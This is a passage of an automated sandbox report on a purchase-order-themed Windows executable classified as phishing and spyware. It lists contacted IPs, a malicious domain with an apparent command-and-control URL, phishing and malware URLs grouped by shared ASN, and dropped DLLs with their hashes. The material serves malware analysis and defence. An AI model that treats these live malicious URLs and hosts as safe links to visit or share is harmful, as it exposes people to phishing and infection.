3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172491492.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp	false		high
http://dbxo2.shop/dbx2/index.php?	PO No. 3200005919.exe, 00000005.00000002.7238816533.00000000017A9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://mozilla.org0	PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, qipcap.dll.1.dr	false	Avira URL Cloud: safe	unknown
http://ocsp.thawte.com0	PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172491492.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mozilla.com0	PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172491492.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
86.109.170.4	montevivo.es	Spain		196713	ABANSYS_AND_HOSTYTEC-ASCCharlesRobertDarwin11ES	false
104.21.2.6	dbxo2.shop	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	755357
Start date and time:	2022-11-28 16:34:15 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	PO No. 3200005919.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.phis.troj.spyw.evad.winEXE@8/56@2/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 8.9% (good quality ratio 8.6%) Quality average: 88.1% Quality standard deviation: 22.6%
HCA Information:	Successful, ratio: 94% Number of executed functions: 67 Number of non-executed functions: 77
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe
Excluded IPs from analysis (whitelisted): 40.126.31.73, 20.190.159.2, 20.190.159.71, 20.190.159.75, 40.126.31.71, 20.190.159.0, 20.190.159.68, 20.190.159.4
Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, client.wns.windows.com, prda.aadg.msidentity.com, login.live.com, login.msa.msidentity.com, www.tm.a.prd.aadg.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	https://whores-near-you.com/n185	Get hash	malicious	Browse	188.114.97.3
	500 126.html	Get hash	malicious	Browse	104.18.11.207
	Paid_invoice.html	Get hash	malicious	Browse	104.18.11.207
	https://storageapi.fleek.co/230cd701-cb1b-49c1-907c-9b7012f1b99b-bucket/qen.html#	Get hash	malicious	Browse	104.17.25.14
	https://www.degussa-bank.de/c/blogs/find_entry?p_1_id=0&noSuchEntryRedirect=https://www.sba.gov///www.iedcolombiaaprende.edu.co/doc/	Get hash	malicious	Browse	104.18.11.207
	https://mailsrver.contributes.rest/databases.html?home=mafisher@archphila.org	Get hash	malicious	Browse	104.21.20.237
	VM28903287.html	Get hash	malicious	Browse	104.17.25.14
	file.exe	Get hash	malicious	Browse	104.21.71.105
	http://tinyurl.com/35z2tkh4	Get hash	malicious	Browse	172.67.1.225
	RFQ 8525-22.exe	Get hash	malicious	Browse	172.67.214.243
	E-Fax_Attached_for_savethechildren.org_-_Nov_24_2022-1.eml	Get hash	malicious	Browse	172.64.132.15
	Encomenda(P.O52403495-2022)INAUTOM.exe	Get hash	malicious	Browse	188.114.96.3
	Swift Mesaj#U0131#09971.exe	Get hash	malicious	Browse	172.67.203.65
	Orden de compra #PO06709.vbs	Get hash	malicious	Browse	172.67.184.213
	https://zpr.io/3C7L92FR2mkt	Get hash	malicious	Browse	104.22.24.131
	https://m52qkvexb4orfft3rdgn4jilepn4c7o4frvfguoxoinzpcnom-ipfs-w3s-link.translate.goog/?_x_tr_hp=bafybeicle&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp#claus.sauter@verbio.de	Get hash	malicious	Browse	104.18.23.52
	file.exe	Get hash	malicious	Browse	188.114.96.3
	Facture.html	Get hash	malicious	Browse	104.26.7.107
	file.exe	Get hash	malicious	Browse	172.67.161.69
	045624132441524.exe	Get hash	malicious	Browse	23.227.38.74
ABANSYS_AND_HOSTYTEC-ASCCharlesRobertDarwin11ES	justificante de transferencia.vbs	Get hash	malicious	Browse	86.109.178.184
	justificante de transferencia.vbs	Get hash	malicious	Browse	86.109.178.184
	mPiGBvuVOZ	Get hash	malicious	Browse	86.109.161.101
	by0RJi2Iv5	Get hash	malicious	Browse	86.109.161.105
	home.x86	Get hash	malicious	Browse	86.109.161.102
	TRxXcJhSPC	Get hash	malicious	Browse	86.109.161.106
	Payment Report - 2022-06-13_1548 Mwenergy.zip	Get hash	malicious	Browse	86.109.166.218
	ACH Payment Advice.xls	Get hash	malicious	Browse	86.109.166.218
	GND-010622 RMXI-130622.xls	Get hash	malicious	Browse	86.109.166.218
	75_06132022.xls	Get hash	malicious	Browse	86.109.166.218
	form 06.13.2022 Marylanning.xls	Get hash	malicious	Browse	86.109.166.218
	Rechnungs-Details.xls	Get hash	malicious	Browse	86.109.166.218
	NAP038527191TW.zip	Get hash	malicious	Browse	86.109.166.218
	form 06.13.2022 Marylanning.xls	Get hash	malicious	Browse	86.109.166.218
	MEgW3GiWtx	Get hash	malicious	Browse	86.109.161.106
	mips-20220403-1044	Get hash	malicious	Browse	86.109.161.104
	copy payment.xls	Get hash	malicious	Browse	86.109.178.186
	ARCHIVO-709459.xls	Get hash	malicious	Browse	86.109.178.186
	ARCHIVO-709459.xls	Get hash	malicious	Browse	86.109.178.186
	Form 03.29.2022, USA.xls	Get hash	malicious	Browse	86.109.178.186

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-console-l1-1-0.dll	Swift Mesaj#U0131#09971.exe	Get hash	malicious	Browse
	E-DEKONT.exe	Get hash	malicious	Browse
	VAN66789.exe	Get hash	malicious	Browse
	e555fe3baa7d282f00cdaccf6ce2820d9fdc6556f8f24.exe	Get hash	malicious	Browse
	MhQTqiCvm1.exe	Get hash	malicious	Browse
	PROFORMA-418340-2022.exe	Get hash	malicious	Browse
	SecuriteInfo.com.NSIS.InjectorX-gen.6534.4411.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Win32.BotX-gen.30874.3243.exe	Get hash	malicious	Browse
	Fedex No71502.exe	Get hash	malicious	Browse
	gunzipped.exe	Get hash	malicious	Browse
	PO110859600.js	Get hash	malicious	Browse
	cH9kNQjk7C.jar	Get hash	malicious	Browse
	PO-11085960.js	Get hash	malicious	Browse
	879-5160.js	Get hash	malicious	Browse
	Orderlist.jar	Get hash	malicious	Browse
	e-dekont.pdf.exe	Get hash	malicious	Browse
	Dekont.exe	Get hash	malicious	Browse
	e-dekont.pdf.exe	Get hash	malicious	Browse
	Purchase Order-#17001396.exe	Get hash	malicious	Browse
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\382858288932396262502121.tmp

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 3, database pages 22, 1st free page 7, free pages 2, cookie 0x10, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	45056
Entropy (8bit):	0.7853305971874845
Encrypted:	false
SSDEEP:	48:43b/DVIIgyZKLk8s8LKvUf9K4UKTgyJqhtcebVEq8Ma0D0HOlcjlGxdKmtAONu41:Sb+uKLyeym/grcebn8MouOjlGxdKmt3N
MD5:	00C036C61F625BF9D25362B9BE24ADEB
SHA1:	6738C3D037E4A2E9F41B1398BA88E5771532F593
SHA-256:	0C187B091E99E5BB665C59F8F8E027D5658904B32E4196D2EB402F3B1CAD69EF
SHA-512:	711265BC8C1653BF6E862343BF3149A2AB09F4BA7D38E2D8A437001DB6C0F1936F6362571DD577CD7BDBEEC766DF141CB7E0681512C12E25A99CDB71731232D1
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-console-l1-1-0.dll

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.080160932980843
Encrypted:	false
SSDEEP:	192:3jBMWIghWGZiKedXe123Ouo+Uggs/nGfe4pBjS/uBmWh0txKdmVWQ4GWDZoiyqnP:GWPhWVXYi00GftpBjSemTltcwpS
MD5:	502263C56F931DF8440D7FD2FA7B7C00
SHA1:	523A3D7C3F4491E67FC710575D8E23314DB2C1A2
SHA-256:	94A5DF1227818EDBFD0D5091C6A48F86B4117C38550343F780C604EEE1CD6231
SHA-512:	633EFAB26CDED9C3A5E144B81CBBD3B6ADF265134C37D88CFD5F49BB18C345B2FC3A08BA4BBC917B6F64013E275239026829BA08962E94115E94204A47B80221
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Swift Mesaj#U0131#09971.exe, Detection: malicious, Browse Filename: E-DEKONT.exe, Detection: malicious, Browse Filename: VAN66789.exe, Detection: malicious, Browse Filename: e555fe3baa7d282f00cdaccf6ce2820d9fdc6556f8f24.exe, Detection: malicious, Browse Filename: MhQTqiCvm1.exe, Detection: malicious, Browse Filename: PROFORMA-418340-2022.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.NSIS.InjectorX-gen.6534.4411.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.BotX-gen.30874.3243.exe, Detection: malicious, Browse Filename: Fedex No71502.exe, Detection: malicious, Browse Filename: gunzipped.exe, Detection: malicious, Browse Filename: PO110859600.js, Detection: malicious, Browse Filename: cH9kNQjk7C.jar, Detection: malicious, Browse Filename: PO-11085960.js, Detection: malicious, Browse Filename: 879-5160.js, Detection: malicious, Browse Filename: Orderlist.jar, Detection: malicious, Browse Filename: e-dekont.pdf.exe, Detection: malicious, Browse Filename: Dekont.exe, Detection: malicious, Browse Filename: e-dekont.pdf.exe, Detection: malicious, Browse Filename: Purchase Order-#17001396.exe, Detection: malicious, Browse Filename: Ziraat Bankasi Swift Mesaji.exe, Detection: malicious, Browse
Reputation:	high, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....."............!......................... ...............................0.......J....@.............................+............ ..................8=..............T............................................................................text...+........................... ..`.rsrc........ ......................@..@......".........;...T...T.........".........d.................".....................RSDSMB...5.G.8.'.d.....api-ms-win-core-console-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......+....edata... ..`....rsrc$01....` .......rsrc$02......................".....................(...`...............,...W...................G...o...............................D...s...............5...b...............................................api-ms-win-core-console-l1-1-0.dll.AllocConsole.kern

C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-datetime-l1-1-0.dll

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.093995452106596
Encrypted:	false
SSDEEP:	192:RWIghWG4U9xluZo123Ouo+Uggs/nGfe4pBjSbMDPxVWh0txKdmVWQ4CWrDry6qnZ:RWPhWFv0i00GftpBjBHem6plUG+zIw
MD5:	CB978304B79EF53962408C611DFB20F5
SHA1:	ECA42F7754FB0017E86D50D507674981F80BC0B9
SHA-256:	90FAE0E7C3644A6754833C42B0AC39B6F23859F9A7CF4B6C8624820F59B9DAD3
SHA-512:	369798CD3F37FBAE311B6299DA67D19707D8F770CF46A8D12D5A6C1F25F85FC959AC5B5926BC68112FA9EB62B402E8B495B9E44F44F8949D7D648EA7C572CF8C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...A..............!......................... ...............................0.......#....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....A...........<...T...T.......A...........d...............A.......................RSDS...W,X.l..o....4....api-ms-win-core-datetime-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02....................A.......P...............(...8...H...................t.......................api-ms-win-core-datetime-l1-1-0.dll.GetDateFormatA.kernel32.GetDateFormatA.GetDateFormatW.kernel32.GetDateFormatW.GetTimeFormatA.kernel32.GetTimeFormatA

C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-debug-l1-1-0.dll

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.1028816880814265
Encrypted:	false
SSDEEP:	384:cWPhWM4Ri00GftpBj2YILemtclD16PaEC:l10oiBQe/L
MD5:	88FF191FD8648099592ED28EE6C442A5
SHA1:	6A4F818B53606A5602C609EC343974C2103BC9CC
SHA-256:	C310CC91464C9431AB0902A561AF947FA5C973925FF70482D3DE017ED3F73B7D
SHA-512:	942AE86550D4A4886DAC909898621DAB18512C20F3D694A8AD444220AEAD76FA88C481DF39F93C7074DBBC31C3B4DAF97099CFED86C2A0AAA4B63190A4B307FD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......GF....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@................9...T...T...................d.......................................RSDS.j..v..C...B..h....api-ms-win-core-debug-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................P...............(...8...H...\|...............q.......................api-ms-win-core-debug-l1-1-0.dll.DebugBreak.kernel32.DebugBreak.IsDebuggerPresent.kernel32.IsDebuggerPresent.OutputDebugStringA.kernel32.OutputDebugStri

C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-errorhandling-l1-1-0.dll

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.126358371711227
Encrypted:	false
SSDEEP:	192:NFmxD3PWIghWGJY/luZo123Ouo+Uggs/nGfe4pBjSffcp8Wh0txKdmVWQ4yWRzOr:NFkWPhW60i00GftpBj4emHlD16Pa7v
MD5:	6D778E83F74A4C7FE4C077DC279F6867
SHA1:	F5D9CF848F79A57F690DA9841C209B4837C2E6C3
SHA-256:	A97DCCA76CDB12E985DFF71040815F28508C655AB2B073512E386DD63F4DA325
SHA-512:	02EF01583A265532D3970B7D520728AA9B68F2B7C309EE66BD2B38BAF473EF662C9D7A223ACF2DA722587429DA6E4FBC0496253BA5C41E214BEA240CE824E8A2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...\x.............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....\x..........A...T...T.......\x..........d...............\x......................RSDS.1....U45.z.d.....api-ms-win-core-errorhandling-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............\x......n...............(...D...`...................4...f.......................'...J.....................api-ms-win-core-errorhandling-l1-1-0.dll.GetErrorMode.kernel32.GetErrorMode.GetLastError.kernel32.GetLastError.RaiseExcept

C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-file-l1-1-0.dll

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	21816
Entropy (8bit):	7.014255619395433
Encrypted:	false
SSDEEP:	384:d6PvVXHWPhWnsnhi00GftpBjaJemyDlD16PamW8:UPvVX85nhoisJeLt8
MD5:	94AE25C7A5497CA0BE6882A00644CA64
SHA1:	F7AC28BBC47E46485025A51EEB6C304B70CEE215
SHA-256:	7EA06B7050F9EA2BCC12AF34374BDF1173646D4E5EBF66AD690B37F4DF5F3D4E
SHA-512:	83E570B79111706742D0684FC16207AE87A78FA7FFEF58B40AA50A6B9A2C2F77FE023AF732EF577FB7CD2666E33FFAF0E427F41CA04075D83E0F6A52A177C2B0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!.........................0...............................@......./....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@...............8...T...T..................d......................................RSDS.0...B..8....G....api-ms-win-core-file-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................K...K.......D...p...6...`.......................?...l...............A...................6..._...................;...e............... ...I...n...............-...d......................g..................U...................M...

C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-file-l1-2-0.dll

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.112057846012794
Encrypted:	false
SSDEEP:	192:IWIghWGJnWdsNtL/123Ouo+Uggs/nGfe4pBjSfcD63QXWh0txKdmVWQ4yW1rwqnh:IWPhWlsnhi00GftpBjnem9lD16PamFP
MD5:	E2F648AE40D234A3892E1455B4DBBE05
SHA1:	D9D750E828B629CFB7B402A3442947545D8D781B
SHA-256:	C8C499B012D0D63B7AFC8B4CA42D6D996B2FCF2E8B5F94CACFBEC9E6F33E8A03
SHA-512:	18D4E7A804813D9376427E12DAA444167129277E5FF30502A0FA29A96884BF902B43A5F0E6841EA1582981971843A4F7F928F8AECAC693904AB20CA40EE4E954
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...._.L...........!......................... ...............................0............@.............................L............ ..................8=..............T............................................................................text...<........................... ..`.rsrc........ ......................@..@....._.L........8...T...T........_.L........d................_.L....................RSDS........g"Y........api-ms-win-core-file-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg.......L....edata... ..`....rsrc$01....` .......rsrc$02........._.L....@...................(...8...l...............`.......................api-ms-win-core-file-l1-2-0.dll.CreateFile2.kernel32.CreateFile2.GetTempPathW.kernel32.GetTempPathW.GetVolumeNameForVolumeMountPointW.kernel32.GetVolumeNameForVolumeMou

C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-file-l2-1-0.dll

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.166618249693435
Encrypted:	false
SSDEEP:	192:BZwWIghWG4U9ydsNtL/123Ouo+Uggs/nGfe4pBjSbUGHvNWh0txKdmVWQ4CWVU9h:UWPhWFBsnhi00GftpBjKvxemPlP55QQ7
MD5:	E479444BDD4AE4577FD32314A68F5D28
SHA1:	77EDF9509A252E886D4DA388BF9C9294D95498EB
SHA-256:	C85DC081B1964B77D289AAC43CC64746E7B141D036F248A731601EB98F827719
SHA-512:	2AFAB302FE0F7476A4254714575D77B584CD2DC5330B9B25B852CD71267CDA365D280F9AA8D544D4687DC388A2614A51C0418864C41AD389E1E847D81C3AB744
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...4..\|...........!......................... ...............................0......t.....@.......................................... ..................8=..............T............................................................................text...}........................... ..`.rsrc........ ......................@..@....4..\|........8...T...T.......4..\|........d...............4..\|....................RSDS.=.Co.P..Gd./%P....api-ms-win-core-file-l2-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........4..\|........................D...p...............#...P...................;...g...................<...m...............%...Z.........................api-ms-win-core-file-l2-1-0.dll.CopyFile2.kernel32.CopyFile2.CopyFileExW.kernel32.CopyFileExW.Crea

C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-handle-l1-1-0.dll

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.1117101479630005
Encrypted:	false
SSDEEP:	384:AWPhWXDz6i00GftpBj5FrFaemx+lDbNh/6:hroidkeppp
MD5:	6DB54065B33861967B491DD1C8FD8595
SHA1:	ED0938BBC0E2A863859AAD64606B8FC4C69B810A
SHA-256:	945CC64EE04B1964C1F9FCDC3124DD83973D332F5CFB696CDF128CA5C4CBD0E5
SHA-512:	AA6F0BCB760D449A3A82AED67CA0F7FB747CBB82E627210F377AF74E0B43A45BA660E9E3FE1AD4CBD2B46B1127108EC4A96C5CF9DE1BDEC36E993D0657A615B6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....G...........!......................... ...............................0......V.....@............................._............ ..................8=..............T............................................................................text..._........................... ..`.rsrc........ ......................@..@......G........:...T...T.........G........d.................G....................RSDSQ..{...IS].0.> ....api-ms-win-core-handle-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg......._....edata... ..`....rsrc$01....` .......rsrc$02......................G....Z...............(...<...P...................A...\|...............,.............api-ms-win-core-handle-l1-1-0.dll.CloseHandle.kernel32.CloseHandle.CompareObjectHandles.kernel32.CompareObjectHandles.DuplicateHandle.kernel32

C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-heap-l1-1-0.dll

Process:	C:\Users\user\Desktop\PO No. 3200005919.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.174986589968396
Encrypted:	false
SSDEEP:	192:GElqWIghWGZi5edXe123Ouo+Uggs/nGfe4pBjS/PHyRWh0txKdmVWQ4GWC2w4Dj3:GElqWPhWCXYi00GftpBjP9emYXlDbNs
MD5:	2EA3901D7B50BF6071EC8732371B821C
SHA1:	E7BE926F0F7D842271F7EDC7A4989544F4477DA7
